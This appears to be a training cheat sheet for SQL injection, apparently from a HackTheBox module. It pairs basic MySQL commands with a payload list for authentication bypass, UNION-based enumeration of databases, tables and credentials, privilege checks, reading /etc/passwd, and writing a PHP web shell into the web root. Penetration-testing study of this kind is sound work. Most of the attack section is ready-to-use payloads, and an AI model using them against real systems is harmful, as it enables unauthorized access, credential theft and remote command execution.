SQL Injection Fundamentals
MySQL Basic Commands
mysql -u root -h docker.hackthebox.eu -P 3306 -p
Login to MySQL database
SHOW DATABASES
List available databases
USE users
Switch to database
Tables Management
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update table values
Columns Manipulation
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn To oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output and Sorting
SELECT * FROM logins ORDER BY column_1
Sort by column ascending
SELECT * FROM logins ORDER BY column_1 DESC
Sort descending
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by multiple columns
SELECT * FROM logins LIMIT 2
Show first two results
SELECT * FROM logins LIMIT 1, 2
Show 2 results starting from index 2
SELECT * FROM table_name WHERE <condition>
Filter results by condition
SELECT * FROM logins WHERE username LIKE 'admin%'
Filter results by pattern
MySQL Operator Precedence
Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)
SQL Injection Payloads
Authentication Bypass
admin' or '1'='1
Basic Auth Bypass
admin')--
Auth Bypass with comments
Union Injection
' order by 1--
Detect number of columns by ordering
cn' UNION select 1,2,3-- -
Detect number of columns using Union
cn' UNION select 1,@@version,3,4-- -
Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -
Union injection with 4 columns
Database Enumeration
SELECT @@version
Get MySQL version
SELECT SLEEP(5)
Delay query (fingerprint)
cn' UNION select 1,database(),2,3-- -
Get current database name
cn' UNION select 1, schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA --
List all databases
Table and Column Enumeration
cn' UNION select 1, TABLE_NAME, TABLE_SCHEMA, 4 from INFORMATION_SCHEMA.TABLES where table_schema='dev' --
List all tables in a database
cn' UNION select 1, COLUMN_NAME, TABLE_NAME, TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'--
List all columns in a table
cn' UNION select 1, username, password, 4 from dev.credentials--
Dump data from another database's table
Privilege Checks
cn' UNION SELECT 1, user(), 3, 4--
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"--
Check admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"--
Check all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"--
Check accessible directories
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4--
Read local file /etc/passwd
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write string to local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "" into outfile '/var/www/html/shell.php'-- -
Write web shell in web directory
Last updated